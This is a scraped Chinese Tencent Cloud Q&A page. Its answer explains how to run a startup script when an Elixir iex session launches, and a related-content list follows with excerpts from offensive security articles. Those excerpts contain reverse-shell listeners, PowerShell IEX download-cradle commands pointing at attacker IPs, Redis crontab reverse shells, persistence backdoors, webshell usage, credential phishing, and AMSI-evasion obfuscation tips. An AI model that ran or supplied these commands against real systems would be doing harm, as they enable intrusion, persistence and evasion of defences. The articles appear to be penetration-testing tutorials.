首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

如何在启动iex会话时执行一些命令?

在启动iex会话时执行一些命令,可以通过在iex启动命令后面添加-r参数来加载一个脚本文件,该脚本文件中可以包含需要执行的命令。

具体步骤如下:

  1. 创建一个脚本文件,例如startup.exs,并在其中编写需要执行的命令。例如,我们可以在脚本文件中添加以下内容:IO.puts "Welcome to iex session!"iex -r startup.exs
  2. 打开终端,输入以下命令启动iex会话,并加载脚本文件:
  3. 此时,iex会话将启动,并执行脚本文件中的命令。在本例中,会输出"Welcome to iex session!"。

需要注意的是,脚本文件的路径应该是相对于当前终端所在的目录。如果脚本文件不在当前目录下,可以使用绝对路径或者相对路径来指定。

推荐的腾讯云相关产品:腾讯云云服务器(CVM),提供了灵活可扩展的云服务器实例,适用于各种应用场景。产品介绍链接地址:https://cloud.tencent.com/product/cvm

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

Linux 启动如何自动执行命令或脚本?

启动执行 Linux 脚本 有两种传统的方法可以实现在启动执行命令或脚本: 方法 #1 - 使用 cron 任务 除了常用格式(分 / / 日 / 月 / 周)外,cron 调度器还支持 @reboot...这个指令后面的参数是脚本(启动执行的那个脚本)的绝对路径。...不过,使用这个方法,需要授予/etc/rc.d/rc.local文件执行权限: # chmod +x /etc/rc.d/rc.local 然后在这个文件底部添加脚本。..."Tecmint.com" DIR=/home/gacanepa echo "$SITE rocks... add us to your bookmarks." > $DIR/file2.txt *启动执行...Linux 脚本 * 记住,一定要提前给两个示例脚本授予执行权限: $ chmod +x /home/gacanepa/script1.sh $ chmod +x /home/gacanepa/script2

3.8K40
  • 反弹shell | 反弹shell总结

    Redis因配置不当可以未授权访问(窃取数据、反弹shell、数据备份操作主从复制、命令执行)。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。...1.3 攻击利用 #### 1.redis基本命令 连接redis: redis-cli -h 192.168.63.130 查看redis版本信息、一些具体信息、服务器版本信息等等: 192.168.63.130...shell 在redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己的服务器上监听一个端口 nc -lvnp 7999 然后执行命令: root@kali:~# redis-cli...····IEX ((New-Object Net.WebClient).DownloadString(‘http://192.168.1.4:4444/connect’)) 然后复制该命令在被攻击机器上执行即可...Step 3:诱导用户去打开该测试文档,然后就可kali终端中有接收到的测试数据 进入反弹回来的会话中,使用interact命令连接主机,intetact DMEYHL1V(会话名字) Shell

    3.4K21

    内网渗透基石篇——权限维持分析

    该后门会在计算机处于空闲状态执行执行成功后会生成名为Persistence.ps1的脚本 $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask...其基本原理是:将代码存储存储于WMI中,达到要求的“无文件”;当设定的条件被满足,系统将自动启动PowerShell进程去后门程序,执行后,进程将消失(持续根据后门的运行情况而定时间,一般是几秒)。...其基本原理为:将代码加密存储于WMI中,实现无文件;当设定的条件被满足,系统将自动启动PowerShell进程去执行后门程序,执行后,进程将会消失,实现无进程。...weevely http://192.168.1.2/test/test.php test 补充: 一些常用命令及功能: • audit_phpconf:审计PHP配置文件 • audit_suidsgid...• backdoor_tcp:在TCP端口出生成一个后门 • sql_dump:导出数据表 • sql_console:执行SQL查询命令或者启动控制台 • net_ifconfig:获取目标网络的地址

    1.4K20

    红队技巧-持久性技巧

    \SafeDogSiteApache\SafeDogSiteApache.exe" //启动正常程序 然后快捷方式链接换成这个bat文件的链接,这样将会即执行了反弹shell,又会执行正常程序,能有效降低管理员的怀疑...Powershell配置文件: PowerShell配置文件是一个PowerShell脚本,您可以对其进行自定义,并将其特定于会话的元素添加到您启动的每个PowerShell会话中。...它是一个在PowerShell启动时运行的脚本,你可以使用配置文件作为登录脚本来自定义环境,你可以添加命令,功能,别名,模块等。...Users\hacker\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append 这样当PowerShell在系统上再次启动...,将执行该文件,并且代理将与命令和控件进行通讯。

    1.2K30

    内网系统凭证钓鱼攻击

    当用户在假登录屏幕上输入密码,他会在 AD 或本地执行验证,从而保证密码是正确的,用户输入时会将结果打印在控制台: ?...web 服务器,该程序会将结果发送至远程服务器,然后远程服务器将收到的结果保存在文本文件中,可以将 Powershell 的命令放在 bat 文件中执行,下载地址: https://github.com...在执行 BAT 文件之前,需要将服务器地址添加到相应的 powershell、php 文件中,执行之后在目标系统上显示的窗口如下: ? 只有当提供的凭据正确,弹出窗口才会消失。...使用下面的命令将 base64 的 payload 执行: powershell.exe -ep bypass -enc ? Metasploit 获得的结果如下: ?...phish_windows_credentials 这个是 Metasploit 框架中的一个模块,可以指定创建特定进程弹出输入提示窗口,必须制定当前已经连接的 Meterpreter 会话: use

    1.4K30

    免杀技巧-执行系统命令方式总结

    那么接下来就会介绍一些免杀思路。” 01 背景 Windows系统提供了多个二进制文件,可以使用它们执行任意命令。 在这,你是不是想到了什么?...既然可以执行命令,那么它将帮助hacker们逃过检测,尤其是对cmd.exe监视的环境下。 当然这需要一些前提条件:未正确配置白名单规则(这里涵盖了文件名和路径),使得一些系统可执行文件能够执行。...命令: forfiles /p c:\windows\system32 /m calc.exe /c C:\tmp\hacker.exe ? Msf开启会话: ?...当然也可以用windows自带的“运行”来执行命令。 Pcalua: 进程兼容性助手是Windows实用程序,当它检测到存在兼容性问题的软件就会运行。...命令: waitfor hacker && PowerShell IEX(new-object net.webclient).downloadstring('http://192.168.73.136:

    1.5K40

    针对黑客的Windows文件传输总结

    这不会将 EXE 文件下载并执行到内存中。 当PowerShell脚本被下载并直接执行到内存中,它会将脚本加载到当前会话中,以便可以执行脚本函数。但是,由于执行策略,这可能会带来问题。...要从 cmd.exe 提示符执行 PowerShell 命令,请使用“ powershell.exe -c ”启动命令,后跟要执行的 PowerShell 命令,并用双引号引起来。...;然而,我们希望使用一些轻量级的东西,我们可以在没有开销的情况下启动和拆除。...假设在我们开始进行 nmap 扫描,我们发现 WinRM 正在端口 5985 上运行。经过一些枚举,我们找到了远程管理用户组中帐户的一组凭据。...现在,我们可以在Invoke-Rubeus函数加载到当前会话执行该函数,并使用该脚本,而无需将其下载到受害者上。

    56511

    四十六.Powershell和PowerSploit脚本攻防万字详解

    最大的例外是,如果PowerShell脚本文件刚好位于你的系统目录中,那么在命令提示符后直接键入脚本文件名即可运行, ....-名词”的形式,New-Item,动词部分一般为Add、New、Get、Remove、Set等,命名的别名一般兼容Windows Command和Linux Shell,Get-ChildItem命令使用...而如果要在PowerShell窗口运行脚本程序,必须要管理员权限将Restricted策略改成Unrestricted,所以在渗透,就需要采用一些方法绕过策略来执行脚本。...//cmd窗口执行以下命令 powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11...NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件 Noexit:执行后不退出Shell,这在使用键盘记录等脚本非常重要 再次强调,PowerShell脚本在默认情况下无法直接执行

    50710

    四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

    最大的例外是,如果PowerShell脚本文件刚好位于你的系统目录中,那么在命令提示符后直接键入脚本文件名即可运行, ....,都采用“动词-名词”的形式,New-Item,动词部分一般为Add、New、Get、Remove、Set等,命名的别名一般兼容Windows Command和Linux Shell,Get-ChildItem...而如果要在PowerShell窗口运行脚本程序,必须要管理员权限将Restricted策略改成Unrestricted,所以在渗透,就需要采用一些方法绕过策略来执行脚本。...//cmd窗口执行以下命令 powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11...NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件 Noexit:执行后不退出Shell,这在使用键盘记录等脚本非常重要 再次强调,PowerShell脚本在默认情况下无法直接执行

    3K30

    工具| PowerShell的内网渗透之旅(二)

    0x00 过渡 之前提到当在执行powershell脚本,由于默认策略的缘故,是会报错的,因此也出现了几种逃过的情况: 本地权限绕过:PowerShell.exe -ExecutionPolicy...下载远程PS1脚本权限绕过执行(在本例PowerSploit框架利用中会使用):powershell.exe "IEX (New-Object Net.WebClient).DownloadString...5).在powershell中调用invoke-shellcode(可通过help命令来查询具体操作以及例子)。 ?...1).通过IEX下载并调用invoke-portscan。 ? ? ? 注意:这里用的全端口扫描,不建议这么做,耗费时间太长,可以扫描一些常规端口。...1).通过IEX下载并调用Get-Keystrokes。 ? ? b.调用Invoke-NinjaCopy复制一些系统无法复制的文件sam文件。

    1.9K60

    渗透测试中常用powershell(一)

    ��������Ȩ�� C:\Users\Jumbo\Desktop>whoami whoami desktop-ej8rt6l\jumbo 导出rdp/winscp/putty/FileZilla会话与密码...powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/fireeye/...raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Invoke-AllChecks" 提权简单介绍: 如果可执行程序路径未用引号引起来...,c:\program data\jumbo.exe,则windows启动该应用时会以空格作为分割运行,会依次尝试运行c:\program.exe、c:\program data\jumbo.exe...,攻击者可以利用进行提权 如果低权限可以更改高权限运行的服务,攻击者可以利用进行提权 获取域用户登录过哪些机器 powershell -nop -exec bypass -c "IEX(New-Object

    1.9K40

    利用USB橡皮鸭在目标机器上启动Empire或Meterpreter会话

    危险藏匿 在一些办公场所故意丢弃一个Ducky,例如接待处,停车场和浴室等这些地方通常成功率都相当高。为了不引起怀疑,我们可以将Ducky的标签更改为一些诱人的内容。...乍一看,我们似乎可以选择直接从“运行”框启动base64编码命令来节约时间,但这是不可能的因为该框不会接受这么多的字符。...启动GParted并切换到USB驱动器(通常是/dev/sdb) 卸载驱动器(分区->卸载) 右键单击并转到“标签文件系统”,然后选择一个符合驱动器故事的标签 点击“应用” 步骤5:进一步的伪装 为了避免一些不必要的情况发生...步骤6:使用之前的PASTEBIN方法设置注入 Air Gapped系统和离线笔记本电脑:从存储执行 在这个例子中我们将创建一个有效负载,以在遇到那些未连接到互联网的计算机时也能创建一个持久性的会话。...最后,我们检查了从Ducky的内部磁盘执行脚本的PoC,即使计算机未连接到互联网也能创建一个持久性的会话。以上讨论的所有技术都是无文件式攻击,因此对于绕过AV也有一定的效果。

    1.7K70

    一种 Powershell 的混淆方式绕过 AMSI 检测

    在这里,iex 在数据变量中执行代码,将其转换为字符串,而错误则重定向到空值,然后将其存储在 $sendback 变量中。...如果你以前玩过 EDR,那么众所周知,这是 IEX 的全名。默认情况下,调用表达式总是被标记为恶意的,因为它用于执行命令。...我们将做的是,使用这个字符串来制作我们的 IEX 命令。...现在同样,我们等待来自服务器的任何输入,在收到任何输入时,它使用 n-eiorvsxpk5执行命令,即 Invoke-Expression,将其转换为字节并发送回。...原因是当你剥离整个代码并在 PowerShell 中逐一执行它们,您将意识到 IEX 是由 AMSI 标记的部分,而不是任何其他部分。但请随意混淆有效载荷的其余部分。

    4.5K40
    领券